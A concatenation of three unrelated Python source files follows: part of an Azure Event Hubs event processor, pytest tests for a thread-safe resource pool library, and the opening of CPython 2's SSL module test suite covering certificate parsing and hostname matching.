self._partition_id = kwargs.get("partition_id", None) # type: Optional[str]
self._error_handler = kwargs.get("on_error", None) # type: Optional[Callable[[PartitionContext, Exception], None]]
self._partition_initialize_handler = kwargs.get("on_partition_initialize", None) # type: Optional[Callable[[PartitionContext], None]]
self._partition_close_handler = kwargs.get("on_partition_close", None) # type: Optional[Callable[[PartitionContext, CloseReason], None]]
self._checkpoint_store = kwargs.get("checkpoint_store", None) # type: Optional[CheckpointStore]
self._initial_event_position = kwargs.get("initial_event_position", "-1") # type: Union[str, int, datetime, Dict[str, Any]]
self._initial_event_position_inclusive = kwargs.get("initial_event_position_inclusive", False) # type: Union[bool, Dict[str, bool]]
self._load_balancing_interval = kwargs.get("load_balancing_interval", 10.0) # type: float
self._ownership_timeout = self._load_balancing_interval * 2
self._partition_contexts = {} # type: Dict[str, PartitionContext]
# Receive parameters
self._owner_level = kwargs.get("owner_level", None) # type: Optional[int]
if self._checkpoint_store and self._owner_level is None:
self._owner_level = 0
self._prefetch = kwargs.get("prefetch", None) # type: Optional[int]
self._track_last_enqueued_event_properties = kwargs.get("track_last_enqueued_event_properties", False)
self._id = str(uuid.uuid4())
self._running = False
self._lock = threading.RLock()
self._consumers = {} # type: Dict[str, EventHubConsumer]
self._ownership_manager = OwnershipManager(
self._eventhub_client,
self._consumer_group,
self._id,
self._checkpoint_store,
self._ownership_timeout,
self._partition_id
)
def __repr__(self):
# type: () -> str
return 'EventProcessor: id {}'.format(self._id)
def _cancel_tasks_for_partitions(self, to_cancel_partitions):
# type: (Iterable[str]) -> None
with self._lock:
for partition_id in to_cancel_partitions:
if partition_id in self._consumers:
self._consumers[partition_id].stop = True
if to_cancel_partitions:
_LOGGER.info("EventProcesor %r has cancelled partitions %r", self._id, to_cancel_partitions)
def _create_tasks_for_claimed_ownership(self, claimed_partitions, checkpoints=None):
# type: (Iterable[str], Optional[Dict[str, Dict[str, Any]]]) -> None
with self._lock:
for partition_id in claimed_partitions:
if partition_id not in self._consumers:
if partition_id in self._partition_contexts:
partition_context = self._partition_contexts[partition_id]
else:
partition_context = PartitionContext(
self._namespace,
self._eventhub_name,
self._consumer_group,
partition_id,
self._checkpoint_store
)
self._partition_contexts[partition_id] = partition_context
checkpoint = checkpoints.get(partition_id) if checkpoints else None
initial_event_position, event_postition_inclusive = self.get_init_event_position(
partition_id,
checkpoint
)
event_received_callback = partial(self._on_event_received, partition_context)
self._consumers[partition_id] = cast('EventHubConsumer', self.create_consumer(
partition_id,
initial_event_position,
event_postition_inclusive,
event_received_callback
))
if self._partition_initialize_handler:
self._handle_callback(
self._partition_initialize_handler,
self._partition_contexts[partition_id]
)
def _handle_callback(self, callback, *args):
# type: (Callable[..., None], Any) -> None
try:
callback(*args)
except Exception as exp: # pylint:disable=broad-except
partition_context = args[0] # type: PartitionContext
if self._error_handler and callback != self._error_handler:
self._handle_callback(self._error_handler, partition_context, exp)
else:
_LOGGER.warning(
"EventProcessor instance %r of eventhub %r partition %r consumer group %r"
" has another error during running process_error(). The exception is %r.",
self._id,
self._eventhub_name,
partition_context.partition_id if partition_context else None,
self._consumer_group,
exp
)
def _on_event_received(self, partition_context, event):
# type: (PartitionContext, EventData) -> None
with self._context(event):
if self._track_last_enqueued_event_properties:
partition_context._last_received_event = event # pylint: disable=protected-access
self._handle_callback(self._event_handler, partition_context, event)
def _load_balancing(self):
# type: () -> None
"""Start the EventProcessor.
The EventProcessor will try to claim and balance partition ownership with other `EventProcessor`
and start receiving EventData from EventHub and processing events.
:return: None
"""
while self._running:
try:
claimed_partition_ids = self._ownership_manager.claim_ownership()
if claimed_partition_ids:
existing_pids = set(self._consumers.keys())
claimed_pids = set(claimed_partition_ids)
to_cancel_pids = existing_pids - claimed_pids
newly_claimed_pids = claimed_pids - existing_pids
if newly_claimed_pids:
checkpoints = self._ownership_manager.get_checkpoints() if self._checkpoint_store else None
self._create_tasks_for_claimed_ownership(newly_claimed_pids, checkpoints)
else:
_LOGGER.info("EventProcessor %r hasn't claimed an ownership. It keeps claiming.", self._id)
to_cancel_pids = set(self._consumers.keys())
if to_cancel_pids:
self._cancel_tasks_for_partitions(to_cancel_pids)
except Exception as err: # pylint:disable=broad-except
_LOGGER.warning("An exception (%r) occurred during balancing and claiming ownership for "
"eventhub %r consumer group %r. Retrying after %r seconds",
err, self._eventhub_name, self._consumer_group, self._load_balancing_interval)
self._handle_callback(self._error_handler, None, err) # type: ignore
# ownership_manager.get_checkpoints() and ownership_manager.claim_ownership() may raise exceptions
# when there are load balancing and/or checkpointing (checkpoint_store isn't None).
# They're swallowed here to retry every self._load_balancing_interval seconds.
# Meanwhile this event processor won't lose the partitions it has claimed before.
# If it keeps failing, other EventProcessors will start to claim ownership of the partitions
# that this EventProcessor is working on. So two or multiple EventProcessors may be working
# on the same partition for a short while.
# Setting owner_level would create exclusive connection to the partition and
# alleviate duplicate-receiving greatly.
time.sleep(self._load_balancing_interval)
def _close_consumer(self, partition_id, consumer, reason):
# type: (str, EventHubConsumer, CloseReason) -> None
consumer.close()
with self._lock:
del self._consumers[partition_id]
_LOGGER.info(
"PartitionProcessor of EventProcessor instance %r of eventhub %r partition %r consumer group %r"
" is being closed. Reason is: %r",
self._id,
self._partition_contexts[partition_id].eventhub_name,
self._partition_contexts[partition_id].partition_id,
self._partition_contexts[partition_id].consumer_group,
reason
)
if self._partition_close_handler:
self._handle_callback(self._partition_close_handler, self._partition_contexts[partition_id], reason)
self._ownership_manager.release_ownership(partition_id)
def start(self):
# type: () -> None
if self._running:
_LOGGER.info("EventProcessor %r has already started.", self._id)
return
_LOGGER.info("EventProcessor %r is being started", self._id)
self._running = True
thread = threading.Thread(target=self._load_balancing)
thread.daemon = True
thread.start()
while self._running:
for partition_id, consumer in list(self._consumers.items()):
if consumer.stop:
self._close_consumer(partition_id, consumer, CloseReason.OWNERSHIP_LOST)
continue
try:
consumer.receive()
except Exception as error: # pylint:disable=broad-except
_LOGGER.warning(
"PartitionProcessor of EventProcessor instance %r of eventhub %r partition %r consumer group %r"
" has met an error. The exception is %r.",
self._id,
self._partition_contexts[partition_id].eventhub_name,
self._partition_contexts[partition_id].partition_id,
self._partition_contexts[partition_id].consumer_group,
error
)
if self._error_handler:
self._handle_callback(self._error_handler, self._partition_contexts[partition_id], error)
self._close_consumer(partition_id, consumer, CloseReason.OWNERSHIP_LOST)
with self._lock:
for partition_id, consumer in list(self._consumers.items()):
self._close_consumer(partition_id, consumer, CloseReason.SHUTDOWN)
def stop(self):
# type: () -> None
"""Stop the EventProcessor.
The EventProcessor will stop receiving events from EventHubs and release the ownership of the partitions
it is working on.
Other running EventProcessor will take over these released partitions.
A stopped EventProcessor can be restarted by calling method `start` again.
:return: None
"""
if not self._running:
_LOGGER.info("EventProcessor %r has already been stopped.", self._id)
return
self._running = False
_LOGGER.info("EventProcessor %r has been stopped.", self._id)
|
test_pool_test.py
|
#!/usr/bin/env python3
import pytest
from threading import Thread
import time
from contextlib import ExitStack
import pyresourcepool.pyresourcepool as rp
class Person(object):
def __init__(self, name):
self.name = name
def do_callback_upper(obj):
time.sleep(1)
obj.name = obj.name.upper()
def do_callback_lower(obj):
time.sleep(1)
obj.name = obj.name.lower()
def do_callback_exception(obj):
raise ValueError("some random error")
# the next line should never be run
obj.name = obj.name.upper()
@pytest.fixture
def pool():
return rp.ResourcePool([Person("John"),
Person("Jim"),
Person("Jake"),
Person("Jason")])
@pytest.fixture
def pool_with_callback_ok():
return rp.ResourcePool([Person("John"),
Person("Jim"),
Person("Jake"),
Person("Jason")],
return_callback=do_callback_upper)
@pytest.fixture
def pool_with_callback_exception():
return rp.ResourcePool([Person("John"),
Person("Jim"),
Person("Jake"),
Person("Jason")],
return_callback=do_callback_exception)
def get_and_hold_resource(p, t):
""" wait/get resource and sleep for 't' seconds """
with p.get_resource():
time.sleep(t)
def test_pool_use(pool):
assert len(pool._available) == 4
assert (pool._available[0].name == "John")
with pool.get_resource() as x:
assert (x.name == "John")
assert len(pool._available) == 3
assert (pool._available[0].name == "Jim")
assert len(pool._available) == 4
assert pool.active_size == 4
assert (pool._available[0].name == "Jim")
assert (pool._available[1].name == "Jake")
assert pool.active_size == 4
assert (pool._available[2].name == "Jason")
assert (pool._available[3].name == "John")
threads = [Thread(target=get_and_hold_resource, args=(pool, 0.4)),
Thread(target=get_and_hold_resource, args=(pool, 0.3)),
Thread(target=get_and_hold_resource, args=(pool, 0.2))]
for t in threads:
t.start()
time.sleep(0.05)
assert len(pool._available) == 1
assert pool.active_size == 4
assert (pool._available[0].name == "John")
assert (pool._available[-1].name == "John")
assert pool.active_size == 4
time.sleep(0.5)
assert len(pool._available) == 4
assert (pool._available[0].name == "John")
assert (pool._available[1].name == "Jason")
assert (pool._available[2].name == "Jake")
assert (pool._available[3].name == "Jim")
assert pool.active_size == 4
# Jim will initially be release first, then held for a second time
# the longest so will appear last
# Jake will initially be released second, then be held for a
# second time the second longest so end up second last
threads = [Thread(target=get_and_hold_resource, args=(pool, 0.6)),
Thread(target=get_and_hold_resource, args=(pool, 0.5)),
Thread(target=get_and_hold_resource, args=(pool, 0.4)),
Thread(target=get_and_hold_resource, args=(pool, 0.3)),
Thread(target=get_and_hold_resource, args=(pool, 0.7)),
Thread(target=get_and_hold_resource, args=(pool, 0.5))]
for t in threads:
t.start()
time.sleep(4.0)
assert len(pool._available) == 4
assert pool.active_size == 4
assert (pool._available[0].name == "Jason")
assert (pool._available[1].name == "John")
assert (pool._available[2].name == "Jake")
assert (pool._available[3].name == "Jim")
assert pool.active_size == 4
def test_pool_object_removal(pool):
# remove all but one from the pool
assert pool.active_size == 4
for i in range(3):
with pool.get_resource() as x:
pool.remove(x)
assert len(pool._available) == 3 - i
assert pool.active_size == 3 - i
assert len(pool._available) == 3 - i
assert pool.active_size == 1
# remove the last item from the pool and expect an exception
with pytest.raises(rp.AllResourcesRemoved):
with pool.get_resource() as x:
pool.remove(x)
# we should not get to this bad assertion because an exception
# should be raised
assert False
# try to get an object from the pool and expect an exception
with pytest.raises(rp.AllResourcesRemoved):
with pool.get_resource() as x:
# we should not get to this bad assertion because an exception
# should be raised
assert False
def test_pool_object_removal_non_member(pool):
# create a new object
obj = Person("Jeff")
with pytest.raises(rp.ObjectNotInPool):
pool.remove(obj)
# we should not get to this bad assertion because an exception
# should be raised
assert False
def test_pool_non_block(pool):
with ExitStack() as stack:
obj1 = stack.enter_context(pool.get_resource(block=False))
assert obj1.name == "John"
obj2 = stack.enter_context(pool.get_resource(block=False))
assert obj2.name == "Jim"
obj3 = stack.enter_context(pool.get_resource(block=False))
assert obj3.name == "Jake"
obj4 = stack.enter_context(pool.get_resource(block=False))
assert obj4.name == "Jason"
# pool should be depleted by this point
obj5 = stack.enter_context(pool.get_resource(block=False))
assert obj5 is None
obj6 = stack.enter_context(pool.get_resource(block=False))
assert obj6 is None
assert len(pool._available) == 4
def test_pool_add(pool):
with pool.get_resource() as obj1:
assert obj1.name == "John"
newPerson = Person("Jenny")
pool.add(newPerson)
assert len(pool._available) == 5
with ExitStack() as stack:
obj1 = stack.enter_context(pool.get_resource(block=False))
assert obj1.name == "Jim"
obj2 = stack.enter_context(pool.get_resource(block=False))
assert obj2.name == "Jake"
obj3 = stack.enter_context(pool.get_resource(block=False))
assert obj3.name == "Jason"
obj4 = stack.enter_context(pool.get_resource(block=False))
assert obj4.name == "John"
obj5 = stack.enter_context(pool.get_resource(block=False))
assert obj5.name == "Jenny"
# pool should be depleted by this point
with pytest.raises(rp.ObjectAlreadyInPool):
pool.add(obj2)
# shouldn't make to the bad assert below
assert False
obj6 = stack.enter_context(pool.get_resource(block=False))
assert obj6 is None
assert len(pool._available) == 0
assert len(pool._available) == 5
with pytest.raises(rp.ObjectAlreadyInPool):
pool.add(newPerson)
# shouldn't make to the 'assert False' below
assert False
assert len(pool._available) == 5
def test_pool_add_list(pool):
newPeople = [Person("Jenny"), Person("Jasmin"), Person("June")]
pool.add(newPeople)
assert len(pool._available) == 7
assert pool.active_size == 7
with ExitStack() as stack:
obj1 = stack.enter_context(pool.get_resource(block=False))
assert obj1.name == "John"
obj2 = stack.enter_context(pool.get_resource(block=False))
assert obj2.name == "Jim"
obj3 = stack.enter_context(pool.get_resource(block=False))
assert obj3.name == "Jake"
obj4 = stack.enter_context(pool.get_resource(block=False))
assert obj4.name == "Jason"
obj5 = stack.enter_context(pool.get_resource(block=False))
assert obj5.name == "Jenny"
obj6 = stack.enter_context(pool.get_resource(block=False))
assert obj6.name == "Jasmin"
obj7 = stack.enter_context(pool.get_resource(block=False))
assert obj7.name == "June"
assert pool.active_size == 7
# pool should be depleted by this point
with pytest.raises(rp.ObjectAlreadyInPool):
pool.add(obj2)
# shouldn't make to the bad assert below
assert False
obj8 = stack.enter_context(pool.get_resource(block=False))
assert obj8 is None
assert len(pool._available) == 0
assert len(pool._available) == 7
def test_pool_return_with_callback_ok(pool_with_callback_ok):
assert pool_with_callback_ok._return_callback == do_callback_upper
with pool_with_callback_ok.get_resource() as obj1:
assert obj1.name == "John"
assert obj1 not in pool_with_callback_ok._available
with pool_with_callback_ok.get_resource() as obj2:
assert obj2.name == "Jim"
assert obj2 not in pool_with_callback_ok._available
# The due to the sleep in the callback, the objects should not yet have
# been returned to the pool, or had the operation in the callback performed yet
assert obj1.name == "John"
assert obj1 not in pool_with_callback_ok._available
assert obj2.name == "Jim"
assert obj2 not in pool_with_callback_ok._available
# callback should have completed now
time.sleep(2)
assert obj1.name == "JOHN"
assert obj1 in pool_with_callback_ok._available
assert obj2.name == "JIM"
assert obj2 in pool_with_callback_ok._available
def test_pool_return_with_callback_exception(pool_with_callback_exception):
assert pool_with_callback_exception._return_callback == do_callback_exception
with pool_with_callback_exception.get_resource() as obj1:
assert obj1.name == "John"
assert obj1 not in pool_with_callback_exception._available
with pool_with_callback_exception.get_resource() as obj2:
assert obj2.name == "Jim"
assert obj2 not in pool_with_callback_exception._available
time.sleep(1)
assert obj1.name == "John"
assert obj1 not in pool_with_callback_exception._available
assert pool_with_callback_exception._removed[id(obj1)]
assert obj2.name == "Jim"
assert obj2 not in pool_with_callback_exception._available
assert pool_with_callback_exception._removed[id(obj2)]
def test_pool_return_with_obj_callback_ok(pool_with_callback_ok):
assert pool_with_callback_ok._return_callback == do_callback_upper
with pool_with_callback_ok.get_resource() as obj1:
assert obj1.name == "John"
assert obj1 not in pool_with_callback_ok._available
# override the callback just for obj1
obj1.resource_pool_return_callback = do_callback_lower
with pool_with_callback_ok.get_resource() as obj2:
assert obj2.name == "Jim"
assert obj2 not in pool_with_callback_ok._available
# The due to the sleep in the callback, the objects should not yet have
# been returned to the pool, or had the operation in the callback performed yet
assert obj1.name == "John"
assert obj1 not in pool_with_callback_ok._available
assert obj2.name == "Jim"
assert obj2 not in pool_with_callback_ok._available
# callback should have completed now
time.sleep(2)
assert obj1.name == "john"
assert obj1 in pool_with_callback_ok._available
assert obj2.name == "JIM"
assert obj2 in pool_with_callback_ok._available
def test_pool_return_with_object_specific_callback(pool):
assert pool._return_callback is None
with pool.get_resource() as obj1:
assert obj1.name == "John"
assert obj1 not in pool._available
obj1.resource_pool_return_callback = do_callback_lower
with pool.get_resource() as obj2:
assert obj2.name == "Jim"
assert obj2 not in pool._available
# The due to the sleep in the callback, the objects should not yet have
# been returned to the pool, or had the operation in the callback performed yet
assert obj1.name == "John"
assert obj1 not in pool._available
# callback should have completed now
time.sleep(2)
assert obj1.name == "john"
assert obj1 in pool._available
assert obj2.name == "Jim"
assert obj2 in pool._available
def test_return_object_not_in_pool(pool, pool_with_callback_ok):
obj1 = Person("Kevin")
with pytest.raises(rp.ObjectNotInPool):
pool.return_resource(obj1)
# we should not make it to this bad assertion
assert False
with pytest.raises(rp.ObjectNotInPool):
pool_with_callback_ok.return_resource(obj1)
# we should not make it to this bad assertion
assert False
|
test_ssl.py
|
# -*- coding: utf-8 -*-
# Test the support for SSL and sockets
import sys
import unittest
from test import test_support as support
from test.script_helper import assert_python_ok
import asyncore
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import shutil
import urllib2
import traceback
import weakref
import platform
import functools
from contextlib import closing
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = CERTFILE.encode(sys.getfilesystemencoding())
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = ONLYCERT.encode(sys.getfilesystemencoding())
BYTES_ONLYKEY = ONLYKEY.encode(sys.getfilesystemencoding())
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = CAPATH.encode(sys.getfilesystemencoding())
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNING_CA = data_file("pycacert.pem")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
REMOTE_ROOT_CERT = data_file("selfsigned_pythontestdotnet.pem")
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = DHFILE.encode(sys.getfilesystemencoding())
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
class BasicTests(unittest.TestCase):
def test_sslwrap_simple(self):
# A crude test for the legacy API
try:
ssl.sslwrap_simple(socket.socket(socket.AF_INET))
except IOError, e:
if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
pass
else:
raise
try:
ssl.sslwrap_simple(socket.socket(socket.AF_INET)._sock)
except IOError, e:
if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
pass
else:
raise
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 1):
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Jan 17 19:09:06 2028 GMT'))
self.assertEqual(p['notBefore'], asn1time('Jan 19 19:09:06 2018 GMT'))
self.assertEqual(p['serialNumber'], 'F9BA076D5B6ABD9B')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, (int, long))
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# socket.error raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with closing(ssl.wrap_socket(s)) as ss:
self.assertRaises(socket.error, ss.recv, 1)
self.assertRaises(socket.error, ss.recv_into, bytearray(b'x'))
self.assertRaises(socket.error, ss.recvfrom, 1)
self.assertRaises(socket.error, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(socket.error, ss.send, b'x')
self.assertRaises(socket.error, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with closing(ssl.wrap_socket(s)) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors(self):
sock = socket.socket()
self.assertRaisesRegexp(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegexp(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegexp(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with closing(ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE)) as s:
self.assertRaisesRegexp(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError) as cm:
with closing(socket.socket()) as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
